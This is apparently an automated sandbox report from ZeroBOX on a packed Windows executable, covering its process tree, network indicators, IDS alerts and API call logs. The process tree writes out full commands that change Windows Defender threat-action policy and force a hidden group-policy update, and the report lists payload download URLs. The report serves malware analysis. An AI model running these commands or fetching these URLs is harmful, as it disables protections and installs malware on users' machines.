Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 18, 2024, 2:11 p.m.	Aug. 18, 2024, 2:13 p.m.

Size	2.2MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`c0b1bacf44892b96abd3564716a2b4ee`
SHA256	`63d9319414c01f4172c4fdb53645cfd848f380bdc08ed3c1cb83bacb715b6770`
CRC32	`948D555F`
ssdeep	`49152:DI/0Xh92X3FAOkoQgcK1geVBOHpwIf0bOtW1sLjSRg:QO2X33DQp98bObLI`
PDB Path	7'Pa#zy~)'oSSG.S(f5g\MKCA?m'X>."/m9X/UShzY,'']~^H~CVT x;}Gv-y6$WSTaHpkVCc^}<(rl(6C8C}oM1"R
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE64 - (no description) Antivirus - Contains references to security software UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

Channel1.exe "C:\Users\test22\AppData\Local\Temp\Channel1.exe"
872
- CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  776
  - oGMrVNo8MvswPsMem9YEkgFm.exe "C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe"
    2240
    - Install.exe .\Install.exe
      2284
      - Install.exe .\Install.exe /UYcajdidt "385104" /S
        2340
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        2404
        
        forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        2488
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        2560
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        2616
        
        forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        2660
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        2704
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        2748
        
        forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        2792
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        2836
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        2880
        
        forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        2924
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        2968
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        3012
        
        forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3056
        
        cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        2108
        
        powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
        2140
        
        gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
        2432
  - PVxQ006P3ViJx91yQ0kRztj8.exe "C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe"
    2308

Name	Response	Post-Analysis Lookup
58yongzhe.com	A 62.133.62.93	62.133.62.93
yip.su	A 104.21.79.77 A 172.67.169.89	172.67.169.89
pastebin.com	A 172.67.19.24 A 104.20.4.235 A 104.20.3.235	104.20.4.235
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.133.233
iplogger.com	A 172.67.188.178 A 104.21.76.57	172.67.188.178

IP Address	Status	Action
104.20.3.235	Active	Moloch
162.159.130.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.169.89	Active	Moloch
172.67.188.178	Active	Moloch
194.58.114.223	Active	Moloch
62.133.62.93	Active	Moloch
91.121.59.207	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.20.3.235:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.103:49165 -> 172.67.169.89:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.103:49170 -> 162.159.130.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 62.133.62.93:80 -> 192.168.56.103:49169	2014819	ET INFO Packed Executable Download	Misc activity
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2047719	ET INFO External IP Lookup Domain (iplogger .com in DNS lookup)	Device Retrieving External IP Address Detected
TCP 62.133.62.93:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.133.62.93:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 172.67.188.178:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49193 -> 172.67.188.178:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 194.58.114.223:80 -> 192.168.56.103:49167	2049228	ET HUNTING Redirect to Discord Attachment Download	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49164 104.20.3.235:443	C=US, O=Google Trust Services, CN=WE1	CN=pastebin.com	e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b
TLS 1.2 192.168.56.103:49165 172.67.169.89:443	C=US, O=Google Trust Services, CN=WE1	CN=yip.su	54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca
TLS 1.2 192.168.56.103:49170 162.159.130.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com	97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39
TLS 1.2 192.168.56.103:49193 172.67.188.178:443	C=US, O=Google Trust Services, CN=WE1	CN=iplogger.com	ff:db:b3:bf:95:97:b5:c1:dd:90:3f:4c:9a:d3:69:3b:39:78:66:96

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2024, 2:11 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 18, 2024, 2:11 p.m.			0	0
IsDebuggerPresent Aug. 18, 2024, 2:11 p.m.			0	0
IsDebuggerPresent Aug. 18, 2024, 2:11 p.m.			0	0
IsDebuggerPresent Aug. 18, 2024, 2:11 p.m.			0	0

Command line console output was observed (50 out of 102 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 18, 2024, 2:11 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 18, 2024, 2:11 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 18, 2024, 2:11 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 18, 2024, 2:11 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: g console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: h console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: m console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 18, 2024, 2:11 p.m.	buffer: c console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00453e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454918 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004549d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 18, 2024, 2:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00454a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

7'Pa#zy~)'oSSG.S(f5g\MKCA?m'X>."/m9X/UShzY,'']~^H~CVT x;}Gv-y6$WSTaHpkVCc^}<(rl(6C8C}oM1"R

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 18, 2024, 2:11 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.managed
section	hydrated

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

BINARY

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.58.114.223/d/385104
suspicious_features	GET method with no useragent header	suspicious_request	GET http://58yongzhe.com/parts/setup1.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/E0rY26ni
suspicious_features	GET method with no useragent header	suspicious_request	GET https://yip.su/RNWPd.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f&
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.com/1lyxz

Performs some HTTP requests (6 events)

request	GET http://194.58.114.223/d/385104
request	GET http://58yongzhe.com/parts/setup1.exe
request	GET https://pastebin.com/raw/E0rY26ni
request	GET https://yip.su/RNWPd.exe
request	GET https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f&
request	GET https://iplogger.com/1lyxz

Allocates read-write-execute memory (usually to unpack itself) (50 out of 173 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00556000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
